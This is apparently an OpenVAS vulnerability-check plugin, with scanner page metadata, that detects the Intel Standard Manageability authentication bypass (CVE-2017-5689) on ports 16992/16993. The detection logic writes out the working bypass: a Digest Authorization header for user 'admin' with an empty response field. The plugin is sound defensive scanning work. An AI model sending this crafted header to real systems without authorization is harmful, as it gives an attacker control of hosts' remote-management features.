openvas | Copyright (C) 2017 Greenbone Networks GmbH | OPENVAS:1361412562310810997
History: May 05, 2017 - 12:00 a.m.

Intel Standard Manageability Privilege Escalation Vulnerability

2017-05-05 00:00:00
Copyright (C) 2017 Greenbone Networks GmbH
plugins.openvas.org
51

EPSS: 0.974 (High), percentile 99.9%

This host is running an Intel system with Intel
Standard Manageability and is prone to a privilege escalation vulnerability.

###############################################################################
# OpenVAS Vulnerability Test
#
# Intel Standard Manageability Privilege Escalation Vulnerability
#
# Authors:
# Rinu Kuriakose <[email protected]>
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

# CPE identifier of the product under test. It is passed to get_app_port()
# further down to obtain the port that the check is run against.
CPE = "cpe:/h:intel:intel_standard_manageability";

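# Description mode: register the plugin's metadata (identifiers, scoring,
# report texts, scheduling requirements) and exit. Nothing in this block
# contacts the target; the detection logic follows after the includes.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.810997");
  script_version("2020-05-08T11:13:33+0000");
  script_cve_id("CVE-2017-5689");
  script_bugtraq_id(98269);
  # CVSS v2 base vector: network reachable, low access complexity, no
  # authentication required, complete impact on confidentiality, integrity
  # and availability.
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2020-05-08 11:13:33 +0000 (Fri, 08 May 2020)");
  script_tag(name:"creation_date", value:"2017-05-05 15:39:37 +0530 (Fri, 05 May 2017)");
  # The result comes from an active probe (see the request logic below), not
  # from comparing the firmware version, hence the "exploit" detection type.
  script_tag(name:"qod_type", value:"exploit");
  script_name("Intel Standard Manageability Privilege Escalation Vulnerability");

  script_tag(name:"summary", value:"This host is running Intel system with Intel
  Standard Manageability and is prone to privilege escalation vulnerability.");

  script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request
  and check if we are able to access the manageability features of this product.");

  script_tag(name:"insight", value:"The flaw exists due to mishandling of input
  in an unknown function.");

  script_tag(name:"impact", value:"Successful exploitation will allow an
  unprivileged attacker to gain control of the manageability features provided
  by these products.");

  script_tag(name:"affected", value:"Intel Standard Manageability firmware
  versions 6.x before 6.2.61.3535, 7.x before 7.1.91.3272, 8.x before 8.1.71.3608,
  9.0.x and 9.1.x before 9.1.41.3024, 9.5.x before 9.5.61.3012, 10.x before 10.0.55.3000,
  11.0.x before 11.0.25.3001, 11.5.x and 11.6.x before 11.6.27.3264.");

  script_tag(name:"solution", value:"Upgrade to Intel Standard Manageability
  firmware versions 6.2.61.3535 or 7.1.91.3272 or 8.1.71.3608 or 9.1.41.3024 or
  9.5.61.3012 or 10.0.55.3000 or 11.0.25.3001 or 11.6.27.3264 or later.");

  script_tag(name:"solution_type", value:"VendorFix");

  # The query-string separator is a plain '&'. The HTML entity form '&amp;'
  # is not a valid separator inside a URL and yields a broken reference.
  script_xref(name:"URL", value:"https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr");
  script_xref(name:"URL", value:"https://arstechnica.com/security/2017/05/intel-patches-remote-code-execution-bug-that-lurked-in-cpus-for-10-years");
  # Registered as an active test: the body sends an authentication attempt to
  # the management web interface instead of only reading a banner.
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
  script_family("Web application abuses");
  # Scheduling requirements: the detection script must have run and the
  # version key must be present in the knowledge base.
  # NOTE(review): the key is presumably set by the dependency listed here;
  # confirm against gb_intel_standard_manageability_detect.nasl.
  script_dependencies("gb_intel_standard_manageability_detect.nasl");
  script_mandatory_keys("Intel/Standard/Manageability/version");
  # 16992 and 16993 are the ports on which Intel's manageability web
  # interface is commonly exposed (HTTP and HTTPS respectively).
  script_require_ports("Services/www", 16992, 16993);

  script_xref(name:"URL", value:"https://downloadcenter.intel.com/download/26754");
  exit(0);
}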

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

# Resolve the port to test from the CPE. When no port is returned the script
# stops with exit(0), i.e. without sending anything and without a verdict.
if(!appPort = get_app_port(cpe:CPE)){
  exit(0);
}

# First request: a plain GET of the web interface's index page, sent without
# an Authorization header. The response is examined below for the product's
# Server banner and for the Digest challenge values.
url = "/index.htm";
sndReq = http_get_req(port:appPort, url:url);
rcvRes = http_keepalive_send_recv(port:appPort, data:sndReq);

# Continue only when a response was received and it carries the Intel
# Standard Manageability Server banner; anything else falls through to the
# final exit(99).
if(rcvRes && "Server: Intel(R) Standard Manageability" >< rcvRes)
{
  # Pull two values out of the Digest challenge in the first response:
  # group 1 is the text that follows "Digest" plus one character in the quoted
  # value (re-used below as the realm suffix), group 2 is the nonce.
  # NOTE(review): both groups are greedy and the pattern expects ',stale'
  # directly after the nonce; a challenge with a different field order will
  # not match and the script ends without a verdict.
  match = eregmatch(string:rcvRes, pattern:'"Digest.(.*)", nonce="(.*)",stale');
  if(match[1] && match[2])
  {
    digest = match[1];

    nonce = match[2];
  } else {
    # No usable challenge: stop with exit(0) rather than exit(99), so the
    # host is not recorded as having passed the check.
    exit(0);
  }

  # Authorization header for the second request: user "admin", the realm and
  # nonce echoed from the challenge, and an empty response field, so no
  # credential proof is supplied.
  # NOTE(review): the last string literal spans two source lines, so the
  # header value contains a line break and indentation before cnonce; confirm
  # that this is intended and accepted by the HTTP library and the target.
  # NOTE(review): uri is hard-coded to "/index.htm" and has to stay in sync
  # with the url variable used for the request line.
  asp_session = string('Digest username="admin", realm="Digest:', digest, '", nonce="',
                        nonce, '", uri="/index.htm", response="", qop=auth, nc=00000001,
                        cnonce="cb199a22ab5646c7"');

  sndReq = http_get_req(port:appPort, url:url, add_headers:make_array("Authorization", asp_session));
  rcvRes = http_keepalive_send_recv(port:appPort, data:sndReq);

  # Report only when the second response is an HTTP 200 from the same server
  # and contains all of the listed labels of the hardware information page.
  # Requiring every marker keeps an unrelated 200 page from being reported.
  # NOTE(review): presumably this page is only served to an authenticated
  # session, which is what makes the 200 meaningful; confirm.
  if(rcvRes =~ "^HTTP/1\.[01] 200" && "Server: Intel(R) Standard Manageability" >< rcvRes
             && ">Hardware Information" >< rcvRes && ">IP address" >< rcvRes && ">System ID" >< rcvRes
             && ">System<" >< rcvRes && ">Processor<" >< rcvRes && ">Memory<" >< rcvRes)
  {
    # The finding is reported with the tested URL on the resolved port.
    report = http_report_vuln_url(port:appPort, url: url);
    security_message(port: appPort, data: report);
    exit(0);
  }
}

# Reached when the banner was absent or the second request did not return
# the management page: the check ran and found nothing to report.
exit(99);